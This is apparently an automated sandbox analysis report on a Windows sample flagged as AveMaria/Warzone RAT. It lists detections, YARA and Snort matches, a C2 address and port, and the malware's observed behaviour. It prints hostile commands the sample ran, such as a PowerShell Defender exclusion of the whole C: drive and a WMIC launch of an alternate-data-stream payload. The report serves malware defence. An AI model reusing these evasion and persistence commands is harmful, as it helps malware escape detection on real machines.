Windows Analysis Report
SecuriteInfo.com.Variant.Jaik.73085.20962.11149

Overview

General Information

Sample Name: SecuriteInfo.com.Variant.Jaik.73085.20962.11149 (renamed file extension from 11149 to exe)
Analysis ID: 626897
MD5: 35ed3fe203fabde1b0d353815f9a273b
SHA1: 6a5e219fd96905b154295697ac6f72a13725f6a1
SHA256: 8d4020bea8924365724ff2c7eaffa0541f0ac4712c6b0a4723c5f68858fa306c
Tags: exe

Detection

AveMaria, UACMe
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Sigma detected: Drops script at startup location
Multi AV Scanner detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Snort IDS alert for network traffic
Installs a global keyboard hook
Writes to foreign memory regions
Increases the number of concurrent connection per server for Internet Explorer
Contains functionality to hide user accounts
Creates processes via WMI
Allocates memory in foreign processes
Drops script or batch files to the startup folder
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Adds a directory exclusion to Windows Defender
Creates files in alternative data streams (ADS)
Contains functionality to create processes via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Yara detected Credential Stealer
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Creates a start menu entry (Start Menu\Programs\Startup)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • SecuriteInfo.com.Variant.Jaik.73085.20962.exe (PID: 5708 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe" MD5: 35ED3FE203FABDE1B0D353815F9A273B)
    • powershell.exe (PID: 5900 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • windowupdate.exe (PID: 5732 cmdline: C:\ProgramData\windowupdate.exe MD5: 35ED3FE203FABDE1B0D353815F9A273B)
      • powershell.exe (PID: 316 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 4240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 1636 cmdline: C:\Windows\System32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 3116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cmd.exe (PID: 6080 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 2460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WMIC.exe (PID: 5596 cmdline: wmic process call create '"C:\ProgramData:ApplicationData"' MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
  • WmiPrvSE.exe (PID: 1824 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
  • cleanup
{"C2 url": "104.128.191.44", "port": 8080}
Source: 00000003.00000003.310084355.0000000001080000.00000004.00000020.00020000.00000000.sdmp, Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Author: Florian Roth, Strings:
  • 0x4fd0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x4fd0:$c1: Elevation:Administrator!new:
Source: 00000003.00000003.310084355.0000000001080000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Author: Joe Security
Source: 00000003.00000003.310084355.0000000001080000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 00000003.00000003.310084355.0000000001080000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Author: Joe Security
Source: 00000000.00000003.271131507.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security

Source: 3.3.windowupdate.exe.1084250.2.raw.unpack, Rule: Codoso_Gh0st_2, Description: Detects Codoso APT Gh0st Malware, Author: Florian Roth, Strings:
  • 0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
Source: 3.3.windowupdate.exe.1084250.2.raw.unpack, Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Author: Florian Roth, Strings:
  • 0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0xd80:$c1: Elevation:Administrator!new:
Source: 3.3.windowupdate.exe.1084250.2.raw.unpack, Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Author: Joe Security
Source: 3.3.windowupdate.exe.10be378.0.raw.unpack, Rule: Codoso_Gh0st_2, Description: Detects Codoso APT Gh0st Malware, Author: Florian Roth, Strings:
  • 0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
Source: 3.3.windowupdate.exe.10be378.0.raw.unpack, Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Author: Florian Roth, Strings:
  • 0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0xd80:$c1: Elevation:Administrator!new:

            Data Obfuscation

            Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe, ProcessId: 5708, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat

            Timestamp: 05/15/22-21:37:58.748904
            Source IP: 104.128.191.44
            Destination IP: 192.168.2.3
            SID: 2841903
            Source Port: 8080
            Destination Port: 49694
            Protocol: TCP
            Classtype: A Network Trojan was detected

            Timestamp: 05/15/22-21:37:58.879218
            Source IP: 192.168.2.3
            Destination IP: 104.128.191.44
            SID: 2834979
            Source Port: 49694
            Destination Port: 8080
            Protocol: TCP
            Classtype: A Network Trojan was detected

            AV Detection

            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpackMalware Configuration Extractor: AveMaria {"C2 url": "104.128.191.44", "port": 8080}
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeReversingLabs: Detection: 17%
            Source: Yara matchFile source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000003.310084355.0000000001080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271131507.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271032927.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271207797.0000000000E90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.525655922.00000000038E4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310491730.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.525427546.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.298458664.0000000003474000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310518053.0000000001080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310053824.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310397605.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.297237993.0000000002A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\ProgramData:ApplicationDataReversingLabs: Detection: 17%
            Source: C:\ProgramData\windowupdate.exeReversingLabs: Detection: 17%
            Source: 3.3.windowupdate.exe.10928d8.10.unpackAvira: Label: TR/Patched.Ren.Gen3
            Source: 3.3.windowupdate.exe.10928d8.12.unpackAvira: Label: TR/Patched.Ren.Gen3
            Source: 3.2.windowupdate.exe.38d0000.3.unpackAvira: Label: TR/Redcap.ghjpt
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpackAvira: Label: TR/Redcap.ghjpt
            Source: 3.3.windowupdate.exe.10928d8.4.unpackAvira: Label: TR/Patched.Ren.Gen3
            Source: 3.2.windowupdate.exe.2ed053f.1.unpackAvira: Label: TR/Patched.Ren.Gen3
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpackAvira: Label: TR/Patched.Ren.Gen3
            Source: 3.3.windowupdate.exe.10928d8.5.unpackAvira: Label: TR/Patched.Ren.Gen3

            Exploits

            Source: Yara matchFile source: 3.3.windowupdate.exe.1084250.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.3.windowupdate.exe.10be378.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea7e00.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.3.windowupdate.exe.10be378.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea7e00.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.3.windowupdate.exe.10be378.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.windowupdate.exe.2ee89af.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea4ff8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a789af.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea7e00.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000003.310084355.0000000001080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271032927.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310491730.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.298671123.00000000035AF000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271113826.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.525427546.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310053824.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310397605.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.297237993.0000000002A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.525763010.0000000003A1F000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271046859.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Variant.Jaik.73085.20962.exe PID: 5708, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: windowupdate.exe PID: 5732, type: MEMORYSTR

            Compliance

            Source: C:\ProgramData\windowupdate.exeUnpacked PE file: 3.2.windowupdate.exe.5220000.5.unpack
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeDirectory created: C:\Program Files\Microsoft DN1
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: wuser32.pdb source: windowupdate.exe, 00000003.00000002.527122655.0000000005220000.00000040.00001000.00020000.00000000.sdmp, windowupdate.exe, 00000003.00000002.526701012.0000000004E1E000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\Attributes\Advanced\AtlDuck\debug.pdb source: SecuriteInfo.com.Variant.Jaik.73085.20962.exe, windowupdate.exe.0.dr, ProgramData_ApplicationData.0.dr
            Source: Binary string: wuser32.pdbUGP source: windowupdate.exe, 00000003.00000002.527122655.0000000005220000.00000040.00001000.00020000.00000000.sdmp, windowupdate.exe, 00000003.00000002.526701012.0000000004E1E000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeCode function: 0_2_009ADAE0 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW,0_2_009ADAE0
            Source: C:\ProgramData\windowupdate.exeCode function: 3_2_00D9DAE0 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW,3_2_00D9DAE0
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\

            Networking

            Source: TrafficSnort IDS: 2841903 ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) 104.128.191.44:8080 -> 192.168.2.3:49694
            Source: TrafficSnort IDS: 2834979 ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin 192.168.2.3:49694 -> 104.128.191.44:8080
            Source: Malware configuration extractorURLs: 104.128.191.44
            Source: Joe Sandbox ViewASN Name: EPBTELECOMUS EPBTELECOMUS
            Source: global trafficTCP traffic: 192.168.2.3:49694 -> 104.128.191.44:8080
            Source: unknownTCP traffic detected without corresponding DNS query: 104.128.191.44
            Source: powershell.exe, 0000000D.00000003.411093654.000000000917F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.m
            Source: powershell.exe, 00000001.00000002.389408114.00000000045EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.412976315.0000000004783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000001.00000002.388775306.00000000044B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.412820303.0000000004641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000001.00000002.389408114.00000000045EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.412976315.0000000004783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exe, 00000000.00000002.298458664.0000000003474000.00000002.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Jaik.73085.20962.exe, 00000000.00000002.297237993.0000000002A60000.00000040.00001000.00020000.00000000.sdmp, windowupdate.exe, 00000003.00000002.525655922.00000000038E4000.00000002.00001000.00020000.00000000.sdmp, windowupdate.exe, 00000003.00000002.525427546.0000000002ED0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
            Source: powershell.exe, 00000001.00000003.382885100.0000000007B91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000003.385315234.0000000007BAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000003.383555084.0000000007BAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5n

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: C:\ProgramData\windowupdate.exeWindows user hook set: 0 keyboard low level C:\ProgramData\windowupdate.exe
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exe, 00000000.00000002.298458664.0000000003474000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: GetRawInputData

            E-Banking Fraud

            Source: Yara matchFile source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000003.310084355.0000000001080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271131507.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271032927.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271207797.0000000000E90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.525655922.00000000038E4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310491730.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.525427546.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.298458664.0000000003474000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310518053.0000000001080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310053824.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310397605.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.297237993.0000000002A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 3.3.windowupdate.exe.1084250.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 3.3.windowupdate.exe.10be378.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea7e00.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 3.3.windowupdate.exe.10be378.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea7e00.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.5.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 3.3.windowupdate.exe.10be378.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 3.2.windowupdate.exe.2ee89af.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea4ff8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a789af.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.0.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea7e00.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.6.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
